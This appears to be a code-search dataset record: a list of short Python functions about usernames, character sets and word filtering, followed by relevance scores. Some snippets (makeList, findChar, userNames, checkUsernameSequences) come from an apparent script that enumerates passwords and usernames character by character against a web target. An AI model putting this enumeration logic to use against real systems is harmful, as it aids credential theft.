owner_id=%s\"\"\", [user['id']], single=False)\n\n if len(chars) == 0:\n irc.reply('User \"{0}\" has 0 characters registered'.format(user['username']),\n prefixNick=False)\n else:\n output = []\n for char in chars:\n output.append('{0} [{1}]'.format(\n char['name'],\n char['corporationName']\n ))\n irc.reply('Found {0} characters: {1}'.format(\n len(chars),\n \", \".join(output)\n ), prefixNick=False)", "def get_blocked_usernames_list():\n return []", "def makeList(username, url, caseSensitive = False, wildCards = True):\n charList = []\n for ch in lower:\n # check for ch in \n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n for ch in numbers:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n for ch in special:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n for ch in other:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n if(caseSensitive):\n for ch in upper:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n if(wildCards):\n for ch in wildcards:\n if(checkPasswordCharacter(str(ch), username, url)):\n 
charList.append(str(ch))\n print(ch)\n return charList", "def get_pure_user_words(user_words: List[str], letters: List[str], words_from_dict: List[str]) -> List[str]:\r\n unknown_words = []\r\n for wordd in user_words:\r\n if wordd not in words_from_dict:\r\n unknown_words.append(wordd)\r\n forbidden_letters = [i for i in string.ascii_lowercase]\r\n for i in letters:\r\n try:\r\n forbidden_letters.remove(i)\r\n except:\r\n pass\r\n word_list = []\r\n letstr = \"\"\r\n for i in letters:\r\n letstr += i\r\n for word in unknown_words:\r\n if len(word) >= 4 and len(word) <= 9:\r\n count = 0\r\n for let in word:\r\n if let in forbidden_letters:\r\n count += 1\r\n if word.count(let) > letstr.count(let):\r\n count += 1\r\n if letters[4] not in word:\r\n count += 1\r\n if count == 0:\r\n word_list.append(word)\r\n return word_list", "def invalid_username(username):\n word_letters = re.sub('[^a-zA-Z-0-9]+', '', str(username))\n if any(item.isalpha() for item in word_letters):\n return False\n return True", "def having_letters(self):\r\n self.letter=[chr(c) for c in range(97, 123)]\r\n self.owning_letters=list()\r\n i=0\r\n while i<7:\r\n temp=random.choice(self.letter)\r\n if temp not in self.owning_letters:\r\n self.owning_letters.append(temp)\r\n i+=1\r\n else:\r\n continue\r\n return self.owning_letters", "def get_unique_characters(text):\n return sorted(list(set(text)))", "def search_for_letters(phrase:str, letters:str='aeiou') -> set:\n return set(letters).intersection(set(phrase))", "def _get_unique_chars(self, data_string):\n unique_chars = list(set(data_string))\n return unique_chars", "def listusers():\n allusers = []\n with open('/etc/passwd', 'r') as pw:\n for l in pw.readlines():\n allusers.append(l.split(':')[0])\n users = [ d for d in os.listdir(\"/home\") if d in allusers ]\n return(users)", "def remaining():\n return([letter for letter in alphabet if letter not in [char for char in list(decoded_dict.values()) if char.isupper() == True]])", "def example_usernames():\n return [\"A\", \"B\", \"C\"]", "def other_chars(self):\n return [sign for sign in re.findall(r'[^\\w\\s]', self.text)]", "def remaining_en():\n return([letter for letter in alphabet if decoded_dict[letter].upper() == letter])", "def other_chars(self):\n return re.findall(r'[,.!?_\\':;/#%*\\=@\"]', self.text)", "def _get_consonants(sequence: str) -> list:\n consonants = []\n for char in sequence:\n if char in CONSONANTS:\n consonants.append(char)\n return consonants", "def username_validation(username):\n errors = []\n #Check if Username exists\n if(username_present(username)):\n errors.append(\"Användarnamnet finns redan.\")\n #Username needs to be longer then 3 chars\n if(len(username) <= 3):\n errors.append(\"Användarnamnet mäste vara 3 tecken eller längre.\")\n\n return errors", "def check(self, text):\n p = self.d\n i = 0\n j = 0\n result = []\n ln = len(text)\n while i + j < ln:\n t = text[i + j].lower()\n # print i,j,hex(ord(t))\n if not (t in p):\n j = 0\n i += 1\n p = self.d\n continue\n p = p[t]\n j += 1\n # print p,i,j\n if chr(11) in p:\n p = self.d\n result.append(text[i:i + j])\n i = i + j\n j = 0\n return result", "def normalize_username(username):\n\n regex = compile(UnicodeUsernameValidator.regex)\n normalized_username = \"\"\n for char in username:\n if not regex.match(char):\n continue\n normalized_username += char\n return normalized_username", "def _clean_term(self, term):\n return filter(lambda char: char in allowed_chars, term)", "def userNames(lst, url, tableName):\n n = len(lst)\n # 
https://docs.python.org/3/library/itertools.html#itertools.product\n # https://stackoverflow.com/questions/3034014/how-to-apply-itertools-product-to-elements-of-a-list-of-lists\n lst2 = list(itertools.product(*lst))\n lst3 = list(map(\"\".join, lst2))\n #\n # Maybe use checkUsernameSequences here,\n # then add a check to reduce the amount of possibilities before building lst?\n #\n\n seq = checkUsernameSequences(n, lst, url, tableName, minLen = 2, maxLen = 2)\n # does not include the single characters since minLen > 1\n\n lst4 = filt(seq, lst3)\n \"\"\"# next time:\n find matching strings. That should (hopefully) reduce the space to search. \n REMEMBER, this filtering will miss all single character usernames!!!\n\n https://docs.python.org/3/library/re.html#regular-expression-syntax\n https://stackoverflow.com/questions/3640359/regular-expressions-search-in-list\n https://stackoverflow.com/questions/3040716/python-elegant-way-to-check-if-at-least-one-regex-in-list-matches-a-string\n https://stackoverflow.com/questions/19300020/python-match-a-string-with-regex\n https://stackoverflow.com/questions/37974047/if-any-strings-in-a-list-match-regex\n\"\"\"\n\n lst5 = [x for x in lst4 if checkUsername(x, url, tableName)]\n # lst = list(map(checkUsername, lst2))\n return lst5", "def get_usernames(self, selector: Optional[Callable[[User], bool]]=None) -> Set[str]:\n return set([u.name for u in self.iter_users(selector)])", "def letters_in(string):\n string = remove_accents(string.lower())\n return sorted(\n char\n for char in string\n if char.isalpha()\n )", "def stringContainsAllCharacters(string, characters):\n assert type(string) is str\n assert iter(characters)\n return False not in [character in string for character in characters]", "def get_pure_user_words(user_words, letters, words_from_dict):\n checked_user_words = []\n for each_user_word in user_words:\n if 4 <= len(each_user_word) <= 9:\n if letters[4] in each_user_word:\n count = 0\n for each_user_let in each_user_word:\n if each_user_let in letters:\n count += 1\n if count == len(each_user_word):\n checked_user_words.append(each_user_word)\n for each_word in checked_user_words:\n count_let = 0\n if each_word in words_from_dict:\n checked_user_words.remove(each_word)\n for each_word in checked_user_words:\n coun_me = 0\n for each_let in each_word:\n if each_word.count(each_let) <= letters.count(each_word):\n count_me += 1\n if count_me == len(each_word):\n checked_user_words.remove(each_word)\n return (checked_user_words)", "def search4letters(phrase:str, letters:str='aeyuio') -> set:\n letters_to_be_checked = set(letters)\n return letters_to_be_checked.intersection(set(phrase))", "def blank():\n return([word for word in decoded_words if sum([1 for char in word if char.isupper()==False]) == 1])", "def search4letters(phrase: str, letters: str = 'aeiou') -> set:\n return set(letters).intersection(set(phrase))", "def search4letters(phrase:str, letters:str) -> set:\n return set(letters).intersection(set(phrase))", "def get_user_words() -> List[str]:\r\n user_words = input()\r\n user_words = user_words.split()\r\n return user_words", "def findChar(username, url, charList, i):\n for ch in charList:\n if(checkPasswordCharacter(ch, username, url, index = i)):\n return ch\n #only runs if no ch in charList match:\n # return i #oof, there's no match if i is out of bounds, e.g. 
len(password) < i\n print(\"Missing: \" + i) #so I know when it's not a match\n return \"\" #return an empty string instead\n # Note to self: should not return an _ because it'll match an _ if wildCards are true (default). \n # If wildCards is false, this will just skip characters that don't match anything!", "def tokens(text):\n t = re.sub(\"[A-Z]\", lambda x: \"_\" + x.group(0).lower(), text)\n return set(re.findall('[a-z]+', t))", "def findall(string,chars):\n nb = len(chars) \n return [ pos for pos, c in enumerate(string)\n if pos + nb <= len(string) and string[pos:pos + nb] == chars]", "def verificacionUser(nom_usuario):\n \"\"\"La cuenta de usuario solo puede contener:\n - caracteres alfanumericos\n - '-', '_' o '.' \"\"\"\n nom_usuario = str(nom_usuario)\n nom_usuario = nom_usuario.strip()\n nom_usuario = nom_usuario.lower()\n car_validos = 'abcdefghijklmnopqrstuvwxyz0123456789-_.'\n\n for indice in nom_usuario:\n if(car_validos.find(indice) == -1):\n print('Su nombre de usuario contiene un caracter no valido:',\n \"'\", indice, \"'\")\n return False\n return True", "def is_isogram(word):\n word = [char.lower() for char in word if char.isalpha()]\n for char in word:\n if word.count(char) > 1:\n return False\n return True", "def get_usernames(self) -> list:\n db_list = list(self.cursor.execute('SELECT * FROM sqlite_master'))\n users = [db_list[i][1] for i in range(0, len(db_list), 2)]\n return users", "def filter_users_by_username():\n username = request.args.get('username').strip().lower()\n users = User.query.all()\n users = [user for user in users if username in user.username.lower()]\n return jsonify([user.json() for user in users])", "def find_symbols(text):\n\n words = text.split()\n symbols = []\n\n for word in words:\n # remove leading or trailing punctuation marks\n word = word.translate(str.maketrans(\"\", \"\", punctuation))\n\n if (\n word.isalpha()\n and (word not in symbols)\n and (len(word) <= 5)\n and (word not in BLACKLIST)\n and word.isupper()\n ):\n symbols.append(word)\n\n return symbols", "def test_multiple_char_not_unique(self):\n self.assertFalse(all_unique_chars(\"aa\"))\n self.assertFalse(all_unique_chars(\"alabama\"))\n self.assertFalse(all_unique_chars(\"Ricardio\"))\n self.assertFalse(all_unique_chars(\"aardvark\"))\n self.assertFalse(all_unique_chars(\"Zimbabwe\"))\n self.assertFalse(all_unique_chars(\"....What?....\"))", "def alpha_chars (text):\n for letter in text:\n if letter.isalpha ():\n yield letter", "def onlyuse(word, letters):\r\n truth = True\r\n for letter in word:\r\n truth = letter in letters and truth\r\n return truth", "def test_multiple_char_unique(self):\n self.assertTrue(all_unique_chars(\"ab\"))\n self.assertTrue(all_unique_chars(\"ba\"))\n self.assertTrue(all_unique_chars(\"make\"))\n self.assertTrue(all_unique_chars(\"thorn\"))\n self.assertTrue(all_unique_chars(\"malibu\"))\n self.assertTrue(all_unique_chars(string.ascii_letters))", "def get_available_letters():\n available = string.ascii_lowercase\n\n return available", "def _filter_string(cls, string, extra_chars=\"\"):\n char_white_list = ascii_letters + digits + extra_chars\n return \"\".join([char for char in string if char in char_white_list])", "def _filter_string(cls, string, extra_chars=\"\"):\n char_white_list = ascii_letters + digits + extra_chars\n return \"\".join([char for char in string if char in char_white_list])", "def sanitize_str(s):\n # throw away unkown characters\n return [c for c in s if c in letters]", "def alias_matches(self, text):\n #print 
'Completer->alias_matches:',text # dbg\n text = os.path.expanduser(text)\n aliases = self.alias_table.keys()\n if text == \"\":\n return aliases\n else:\n return [alias for alias in aliases if alias.startswith(text)]", "def find_letters_not_display(guess, secret_word):\n return set(secret_word) - set(guess)", "def has_letter(word):\r\n for char in word:\r\n if char.isalpha():\r\n return True\r\n return False", "def validate_username(username):\n if re.match(r\"^[a-zA-Z0-9åäöÅÄÖ]{3,20}$\", username):\n return True\n return False", "def _get_vowels(sequence: str) -> list:\n vowels = []\n for char in sequence:\n if char in VOWELS:\n vowels.append(char)\n return vowels", "def fun4vowels(value:str)->set:\r\n vowels = set('aeiou')\r\n return vowels.intersection(set(value))", "def _get_char_names(self):\n return [device.get_char_name() for\n device in self.all_devices]", "def contains (self,phrase,chars):\r\n\r\n for x in chars:\r\n\r\n if x in phrase:\r\n return True\r\n return False", "def is_valid_username(self, username):\n rex = \"^[a-zA-Z]{3,}$\"\n return re.match(rex, username)", "def checkWords(line):\n\n words = []\n parts = re.sub('[^a-zA-Z0-9@ ]', '', line)\n parts = parts.lower()\n parts = parts.split(' ')\n for w in parts:\n if w is not '' and len(w) > 4 and len(w) < 15 and w not in commonWords:\n # if w is not '':\n words.append(w)\n\n return words", "def get_words(f: str, letters: List[str]) -> List[str]:\r\n forbidden_letters = [i for i in string.ascii_lowercase]\r\n for i in letters:\r\n try:\r\n forbidden_letters.remove(i)\r\n except:\r\n pass\r\n words_file = open(f)\r\n word_list = []\r\n letstr = \"\"\r\n for i in letters:\r\n letstr += i\r\n for word in words_file:\r\n word = word[:-1].lower()\r\n if len(word) >= 4:\r\n count = 0\r\n for let in word:\r\n if let in forbidden_letters:\r\n count += 1\r\n if word.count(let) > letstr.count(let):\r\n count += 1\r\n if letters[4] not in word:\r\n count += 1\r\n if count == 0:\r\n word_list.append(word)\r\n return word_list", "def is_valid_username(username):\n import string\n\n if not (len(username) > 2 and len(username) < 65):\n return False\n if not username[0] in string.letters:\n return False\n m = re_valid_username.match(username)\n return m.start() == 0 and m.end() == len(username)", "def fetch_usernames(self, users):\n user_list = []\n for user in users:\n user_list.append(user.username)\n return user_list", "def player(self, irc, msg, args, channel, optlist, character):\n if not self.registryValue('full_access', channel):\n irc.reply('Concord denies you access on this channel!')\n return\n\n chars = self._sql(\"\"\"\n SELECT c.username, s.name AS character FROM accounting_capsuler c, character_charactersheet s\n WHERE s.owner_id=c.id and s.name ILIKE %s;\"\"\", ['%%{0}%%'.format(character)], single=False)\n\n if len(chars) == 0:\n irc.reply('Found 0 characters like \"{0}\"'.format(character), prefixNick=False)\n return\n\n if (len(chars) <= self.registryValue('max_lines', channel) or ('all', True) in optlist) \\\n and len(chars) > 0:\n for char in chars:\n irc.reply('{0} :: {1}'.format(\n ircutils.bold(char['username']),\n ircutils.bold(char['character'])\n ), prefixNick=False)\n elif len(chars) > self.registryValue('max_lines', channel):\n irc.reply('Found {0} characters matching \"{1}\", but will list them all unless you use \"owner --all {1}\".'.format(\n len(chars),\n character,\n ), prefixNick=False)", "def user_list(self):\n self.cur.execute(\"SELECT username FROM users\")\n users = []\n for username in 
self.cur.fetchall():\n users.append(username[0])\n return users", "def users():\n retlist = []\n rawlist = cext.users()\n for item in rawlist:\n user, hostname, tstamp = item\n user = py2_strencode(user)\n nt = _common.suser(user, None, hostname, tstamp, None)\n retlist.append(nt)\n return retlist", "def get_user_list(self):\n self.user_list = db.get_user_list()\n for each in self.user_list:\n print each[1] # username\n while(True):\n selection = raw_input(\"Enter username to use\")\n if selection in self.user_list:\n return selection", "def test_multiple_char_unique(self):\n self.assertTrue(all_unique_chars_no_set(\"ab\"))\n self.assertTrue(all_unique_chars_no_set(\"ba\"))\n self.assertTrue(all_unique_chars_no_set(\"make\"))\n self.assertTrue(all_unique_chars_no_set(\"thorn\"))\n self.assertTrue(all_unique_chars_no_set(\"malibu\"))\n self.assertTrue(all_unique_chars_no_set(string.ascii_letters))", "def is_letter(user_input):\n # If any characters is letter -> return boolean True else False\n if any(char.isalpha() for char in user_input):\n return True\n return False", "def simple_unique_characters(word):\n return len(set(word)) == len(word)", "def filter_usernames(self, usernames):\n\t\tself.usernames += self._coerce_list(usernames)", "def verify_username(username):\n name_reg_exp = re.compile(r\"^[a-zA-Z0-9_-]{3,20}$\")\n return username and name_reg_exp.match(username)", "def _characters(self):\n self.characters = list(\n set([item for sublist in self.grid for item in sublist])\n )\n return self.characters", "def disallow_username_substring(self) -> bool:\n return pulumi.get(self, \"disallow_username_substring\")", "def ig_users_in(body):\n import re\n\n try:\n user_re = Formatter.USER_TAG_REGEX\n except AttributeError:\n # escape special characters so we can format the user-tag into a\n # regex pattern\n escaped_user_tag = re.sub(\n # match any '[', ']', '(', or ')'\n r'([\\[\\]\\(\\)])',\n # escape the matched character\n r'\\\\\\1',\n Formatter.USER_TAG\n )\n pattern = escaped_user_tag.format(\n user_raw='({0})'.format(instagram.USERNAME_PTN)\n )\n user_re = re.compile(pattern)\n Formatter.USER_TAG_REGEX = user_re\n\n return user_re.findall(body)", "def get_vowel_names():", "def get_users_by_name(query):\n\n user_list = None\n if query == None:\n user_list = User.objects.filter(Q(user_profile__isnull=False))\n else:\n user_list = User.objects.filter(Q(first_name__icontains=query) | Q(last_name__icontains=query)).distinct()\n return user_list", "def filter_data(text):\n\tlist_of_words = text.split()\n\t#remove non-alphabetical characters and convert to lower case\n\tlist_of_words = [''.join([char for char in word if char in string.ascii_letters]).lower() for word in list_of_words]\n\t#remove empty spaces\n\tlist_of_words = [word for word in list_of_words if word.isalpha()]\n\t#print(list_of_words)\n\treturn list_of_words", "def get_char_names(charlist, caller):\n watch_list = caller.db.watching or []\n verbose_where = False\n if caller.tags.get(\"verbose_where\"):\n verbose_where = True\n return \", \".join(\n char_name(char, verbose_where, watch_list)\n for char in charlist\n if char.player\n and (not char.player.db.hide_from_watch or caller.check_permstring(\"builders\"))\n )", "def char_analyzer(text):\n tokens = text.split()\n return [token[i: i + 3] for token in tokens for i in range(len(token) - 2)]", "def get_speakers(words):\n speakers = []\n utterances = \" \".join(words).split(\"<|endoftext|>\")[:-1]\n for u in utterances:\n s = u.split(\":\")[0].strip() # select names 
according to \":\"\n if s:\n speakers.append(s)\n return list(set(speakers))", "def verify_username(entered_username):\n return USER_RE.match(entered_username)", "def _readUsers(directory):\n\tfiles = os.listdir(directory)\n\tthese_users = []\n\tfor text_file in files:\n\t\tcurrent_file = directory + '/' + text_file\n\t\tf = open(current_file, 'r')\n\t\ttweet_list = f.readlines()\n\t\tsplitted = [string.replace('\"', '').strip().split(',') for string in tweet_list]\n\t\tfor user in splitted:\n\t\t\tif user[1] not in these_users:\n\t\t\t\tthese_users.append(user[1])\n\t\t\telse:\n\t\t\t\tcontinue\n\treturn these_users", "def missing_letters(sentence):\n set1 = set(\"\".join(\n char for char in sentence if char not in punctuation + \" \").lower()\n )\n return sorted(ALPHA - set1)", "def sameFiveCharStartPredicate(field: str) -> FrozenSet[str]:\n return frozenset(initials(field.replace(\" \", \"\"), 5))", "def valid_username(username):\n user_regex = re.compile(r\"^.{5,20}$\")\n return username and user_regex.match(username)", "def user_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"user_names\")", "def user_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"user_names\")", "def check_username(search_username):\n for find_username in USERS_LIST:\n if find_username[\"username\"] == search_username:\n return True\n return False", "def user_names(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"user_names\")", "def user_names(self):\n results = []\n for user_detail in self.users:\n results.append(user_detail.user_name)\n results.sort()\n return results", "def find_words_using_all_vowels():\n pass", "def test_multiple_char_not_unique(self):\n self.assertFalse(all_unique_chars_no_set(\"aa\"))\n self.assertFalse(all_unique_chars_no_set(\"alabama\"))\n self.assertFalse(all_unique_chars_no_set(\"Ricardio\"))\n self.assertFalse(all_unique_chars_no_set(\"aardvark\"))\n self.assertFalse(all_unique_chars_no_set(\"Zimbabwe\"))\n self.assertFalse(all_unique_chars_no_set(\"....What?....\"))", "def get_all_users():", "def getUsers(self):\n return [u[0] for u in pwd.getpwall()\n if (u[5].startswith('/home/') and u[6].endswith('sh'))]", "def allowed(cls):\n # type: () -> List[Str]\n names = cls.names()\n allowed = names\n allowed.extend([name.lower() for name in names])\n return allowed" ]
[ "0.65302527", "0.6494948", "0.63683933", "0.6244168", "0.6195335", "0.61639106", "0.61376554", "0.6136397", "0.6090331", "0.6048526", "0.6043042", "0.6035452", "0.60292345", "0.6010415", "0.59815353", "0.5924206", "0.5911422", "0.58786315", "0.5807217", "0.57925546", "0.578954", "0.5780176", "0.5751811", "0.573854", "0.5725921", "0.5721554", "0.5720262", "0.5706431", "0.56956553", "0.5682372", "0.56790066", "0.5659476", "0.5655004", "0.5633892", "0.5627226", "0.56182057", "0.5618038", "0.5612677", "0.55986404", "0.5595659", "0.5574252", "0.5573723", "0.55667377", "0.55514044", "0.55437773", "0.5531418", "0.5521103", "0.55197495", "0.5512152", "0.55083954", "0.55027544", "0.54872155", "0.54872155", "0.5481726", "0.54789346", "0.54704165", "0.5457976", "0.54415774", "0.54367393", "0.5435065", "0.5432177", "0.5427368", "0.54229754", "0.54209816", "0.5406377", "0.5406297", "0.5404552", "0.5399112", "0.5394323", "0.538957", "0.53812325", "0.53748876", "0.5371315", "0.5369103", "0.53631365", "0.53628063", "0.5362077", "0.536191", "0.53605014", "0.5356303", "0.5352838", "0.5348238", "0.53351086", "0.5324077", "0.5305522", "0.5298764", "0.52955204", "0.5292235", "0.5291094", "0.5290781", "0.5286376", "0.5286376", "0.52863735", "0.5280206", "0.52800894", "0.52784675", "0.527619", "0.52728534", "0.5272605", "0.5271956" ]
0.68477184
0
construct sequences and use those to inform the choice of strings. So if a,b,c,d matches, check aa, ab, ac, ad, ba, bb, bc, bd, ca, cb, cc, cd, da, db, dc, dd.
def checkUsernameSequences(n, ch, url, tableName, minLen = 1, maxLen = 2):
    if(minLen == 1):
        strLst = ch
        # assumes all of ch is a match
    else:
        strLst = []
    for k in range(minLen, maxLen + 1):
        lst = generateSubSequences(k, ch)
        sublst = [x for x in lst if userNameLike(x, url, tableName)]
        # list comprehensions with conditions:
        # https://stackoverflow.com/questions/6475314/python-for-in-loop-preceded-by-a-variable
        strLst += sublst
    return strLst
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def coding_strand_to_AA(dna):\n Seq = ''\n for i in range(0,len(dna),3): \n triple = dna[i:i+3]\n print triple\n for k in range(len(codons)):\n if triple in codons[k]: \n print \"Casey Rocks\"\n print codons[k]\n amino = aa[k]\n Seq+=amino\n return Seq", "def seallable(\n sequence,\n medials={\n 'j', 'w', 'jw', 'wj', 'i̯', 'u̯', 'i̯u̯', 'u̯i̯', 'iu', 'ui', 'y', 'ɥ', 'l',\n 'lj', 'lʲ', 'r', 'rj', 'rʲ', 'ʐ', 'ʑ', 'ʂ', 'ʂ'},\n vowels=VOWELS,\n tones=TONES,\n diacritics=DIACRITICS,\n stress=STRESS,\n cldf=True,\n unknown=REPLACEMENT,\n ):\n if not sequence:\n raise ValueError('empty sequence passed to function')\n if len(sequence) > 5:\n return len(sequence) * [unknown]\n\n cv = soundclass(sequence, model='cv', diacritics=diacritics, stress=stress, cldf=cldf)\n\n ini, med, nuc, cod, ton = 5 * [False]\n\n if 3 <= len(sequence) <= 5:\n # first element must be the initial\n ini = 'i' if cv[0] == 'C' else '?'\n # last element must be tone\n ton = 't' if cv[-1] == 'T' else '?'\n # medial and coda can be missing\n med, nuc, cod = 3 * [False]\n\n # scenario the sequence has 5 elements, all slots must be filled\n if len(sequence) == 5:\n med = 'm' if sequence[1] in medials else '?'\n cod = 'c' if cv[3] == 'C' else '?'\n nuc = 'n' if cv[2] == 'V' else '?'\n \n # scenario the sequence has four slots filled, one must be missing, either\n # coda or medial\n elif len(sequence) == 4:\n med = 'm' if sequence[1] in medials else False\n if not med:\n nuc = 'n' if cv[1] == 'V' else '?'\n cod = 'c' if cv[2] == 'C' else '?'\n else:\n nuc = 'n' if cv[2] == 'V' else '?'\n\n # scenario where the sequence has three slots filled, \n # case 1 : \"ma¹³\". The second token must be a vowel\n # case 2 : \"am¹³\". The first token must be a vowel\n elif len(sequence) == 3:\n if cv[1] == 'V':\n ini = 'i' if cv[0] == 'C' else '?'\n nuc = 'n'\n elif cv[0] == 'V':\n ini = False\n nuc = 'n'\n cod = 'c' if cv[1] == 'C' else '?'\n\n # scenario with two elements only, means that the first element should be a\n # consonant\n elif len(sequence) == 2:\n nuc = 'n' if cv[0] == 'V' else '?'\n ton = 't' if cv[1] == 'T' else '?'\n\n # if only one segment is given, it must be the vowel\n else:\n nuc = 'n' if cv[0] == 'V' else '?'\n\n return [s for s in [ini, med, nuc, cod, ton] if s]", "def controlseq(s): #was the_controlseq\n return any_controlseq().if_value(s)", "def multiple_choice(correct_choice, all_choices):\r\n # format for character is {'あ': 'ah'}\r\n # format for character is {'japanese character': 'english sound'}\r\n\r\n # get 3 different characters from all_choices, randomly\r\n # add all 3 'values', of the k:v pair, to the choices\r\n # if the input from the user != the 'key' of the correct character then it is wrong\r\n # if wrong, try again.\r", "def match(self, seq):\n myseq = seq\n if not type(seq) is Sequence:\n myseq = Sequence(seq, self.alpha)\n mystr = myseq.getString()\n if not Motif.isAlphabet(self, mystr):\n raise RuntimeError(\"Motif alphabet is not valid for sequence \" + myseq.getName())\n for m in re.finditer(self.pattern, mystr):\n yield (m.start(), m.group(), 1.0)", "def coding_strand_to_AA_unit_tests():\n # YOUR IMPLEMENTATION HERE\n input = [\"ATG\", \"ATGCEAFD\", \"FAS\"]\n expected_output = [\"MR\", \"RDS\", \"FF\"]\n actual = []\n for i in input:\n actual.append(coding_strand_to_AA(i))\n print input \n print actual\n print expected_output", "def check1800(s):\n num_translation = str.maketrans(\n 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', '22233344455566677778889999')\n nums_dict = defaultdict(list)\n for word in 
WORDS:\n nums_dict[word.translate(num_translation)].append(word)\n\n number = s[6:].replace('-', '').translate(num_translation)\n\n # we take the cartesian product of all the options for the first word and all the options for the second.\n\n # case 1, first word is 3 letter & second is 4 letter\n possibilities1 = {'1-800-{}-{}'.format(*poss) for poss in it.product(\n nums_dict[number[:3]], nums_dict[number[3:]])}\n\n # case 2, first word is 4 letter & second is 3 letter\n possibilities2 = {'1-800-{}-{}'.format(*poss) for poss in it.product(\n nums_dict[number[:4]], nums_dict[number[4:]])}\n\n return possibilities1.union(possibilities2)", "def ForegroundSeqs(sequences):\n seqs = []\n yts = [\"Y\", \"T\", \"S\"]\n for motif in sequences:\n motif = motif.upper()\n assert \"-\" not in motif, \"gap in motif\"\n assert motif[5] in yts, \"WRONG CENTRAL AMINO ACID\"\n seqs.append(Seq(motif, alphabet=AAlist))\n return seqs", "def testSeqMatch(self): # - - - - - - - - - - - - - - - - - - - - - - - - -\n\n for pair in self.string_pairs:\n\n approx_str_value = stringcmp.seqmatch(pair[0],pair[1])\n\n assert (isinstance(approx_str_value,float)), \\\n '\"SeqMatch\" does not return a floating point number for: '+ \\\n str(pair)\n\n assert (approx_str_value >= 0.0), \\\n '\"SeqMatch\" returns a negative number for: '+str(pair)\n\n assert (approx_str_value <= 1.0), \\\n '\"SeqMatch\" returns a number larger than 1.0 for: '+str(pair)\n\n approx_str_value_1 = stringcmp.seqmatch(pair[0],pair[1])\n approx_str_value_2 = stringcmp.seqmatch(pair[1],pair[0])\n\n assert (approx_str_value_1 == approx_str_value_2), \\\n '\"SeqMatch\" returns different values for pair and swapped ' + \\\n 'pair: '+str(pair)+': '+str(approx_str_value_1)+', '+ \\\n str(approx_str_value_2)\n\n # Check for value 1.0 if the strings are the same\n #\n if (pair[0] == pair[1]):\n\n assert (approx_str_value == 1.0), \\\n '\"SeqMatch\" does not return 1.0 if strings are equal: '+ \\\n str(pair)", "def guess_seq(seq):\n dna = \"ACTG-N\"\n \n chars = util.unique(seq.upper())\n \n for char in chars:\n if char not in dna:\n return \"pep\"\n return \"dna\"", "def translate_sequence(rna_sequence, genetic_code):\n #Crate an empty list to store AA sequence:\n AA_list = []\n # Convert all rna_sequence to upper case:\n rna_sequence=rna_sequence.upper()\n # Convert all rna_sequence into a list:\n rna_list = list(rna_sequence)\n # This conditon will run if rna_sequence is at least 3 bases long, and only once it find start codon ,\n #and stop once it finds stop codon.\n while True:\n if len(rna_list) > 2:\n codon=''.join(rna_list[0:3])\n #Delete first 3 bases since its alread added as codon, thus no longer needed.\n del rna_list[0:3]\n else:\n break\n #Using genetic code dictionary to find AA for each corresponding codon:\n AA=genetic_code[codon]\n #Break loop once it finds stop codon\n if AA=='*':\n break\n #Add add translatable AA to the AA_list:\n AA_list.append(AA)\n return ''.join(AA_list)", "def play_with_regex():\n\n DNA_string = 
\"ATTTGTATGTTCGGCTAACTTCTACCCATCCCCCGAAGTTTAGCAGGTCGTGAGGTGTCATGGAGGCTCTCGTTCATCCCGTGGGACATCAAGCTTCGCCTTGATAAAGCACCCCGCTCGGGTGTAGCAGAGAAGACGCCTACTGAATTGTGCGATCCCTCCACCTCAGCTAAGGTAGCTACCAATATTTAGTTTTTTAGCCTTGCGACAGACCTCCTACTTAGATTGCCACGCATTGAGCTAGCGAGTCAGCGATAAGCATGACGCGCTTTCAAGCGTCGCGAGTATGTGAACCAAGGCTCCGGACAGGACTATATACTTGGGTTTGATCTCGCCCCGACAACTGCAAACCTCAACATTTATAGATTATAAGGTTAGCCGAAATTGCACGTGGTGGCGCCCGCCGACTGCTCCCCGAGTGTGGCTCTTTGATCTGACAACGCGCGACCTCCATCGCGGCCGATTGTTTCTGCGGACCATGTCGTCCTCATAGTTTGGGCATGTTTCCGTTGTAGGAGTGAAGCCACTTAGCTTTGCGCCGTAGTCCCAATGAAAAACCTATGGACTTTGTTTTGGGTAGCATCAGGAATCTGAACCCTGTGAATGTGGGGGTCGCGCGCATAGACCTTTATCTCCGGTTCAAGTTAGGCATGAGGCTGCATGCTACGTTGTCACACCTACACTGCTCGAAGTAAATATGGGAAGCGCGCGGCCTGGCCCGAGGCGTTCCGCGCCGCCACGTGTTCGTTAACTGTTGATTGGTGGCACATAAGCAATACCGTAGTCCCTCAAATTCAGCTCTGTTATCTCGAGCGTTATGTGTCAAATGGCGTAGAACGGGATTGACTGTTTGACACTAGCTGGTGTTCGGTTCGGTAACGGAGAATCTGTGGGGCTATGTCACTAATACTTTCGAAACGCCCCGTACCGATGCTGAACAAGTCGATGCAGGCTCCCGTCTTTGAATAGGGGTAAACATACAAGTCGATAGAAGATGGGT\"\n \n # 1. check if DNA_string starts with \"ATTTGTATG\" (say with re.search() or re.findall())\n regex = re.compile('ATTTGTATG')\n m = regex.search(DNA_string)\n \n # 2. use re.findall() if there are instances of 5 or more consecutive c's in DNA_string\n m = re.finditer('C{5,}',DNA_string)\n for entry in m:\n print entry.span()\n \n # 3. find instances of the motif GGXY in the DNA sequence \n # where X={A,C,G,T} and Y={C,T}\n m = re.finditer('GG[ACGT][CT]',DNA_string)\n print \"NUMBER 3\"\n for entry in m:\n print entry.span()", "def generate_aa_sequence(chain):\n\n chain.strip()\n chain_list = chain.split(' ')\n # TODO: What if aa is not in the lookup\n seq = [IUPAC_AA_codes[aa] for aa in chain_list]\n return ''.join(seq)", "def coding_strand_to_AA_unit_tests():\n input_a='ATTATTATT'\n expected_output='III'\n actual_output=coding_strand_to_AA(input_a)\n print 'Expected Output is ' + expected_output\n print 'Actual Output is ' +actual_output\n \n input_a='ATGATGATT'\n expected_output='MMI'\n 